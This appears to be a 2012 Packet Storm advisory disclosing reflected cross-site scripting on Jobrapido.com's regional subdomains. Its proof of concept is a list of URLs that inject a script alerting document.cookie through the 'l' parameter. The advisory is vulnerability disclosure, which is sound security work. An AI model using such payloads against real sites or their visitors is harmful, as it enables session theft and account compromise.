Jobrapido.com suffers from multiple cross site scripting vulnerabilities.
a2d5de00e2e35e0f11abcafea3e0079a991fa50c325f344c91902feae0159b6e+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Jobrapido.com Multiple XSS
# Date : 07-03-2012
# Author : Ivano Binetti (https://www.ivanobinetti.com)
# Web site : https://www.jobrapido.com
# Web master notification : 07/11/2011
+--------------------------------------------------------------------------------------------------------------------------------+
PoC:
https://us.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://uk.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://it.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://ae.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://ao.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://ar.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://at.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://au.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://be.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://br.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://ca.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
This Poc works for all third-level domains.
+--------------------------------------------------------------------------------------------------------------------------------+
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed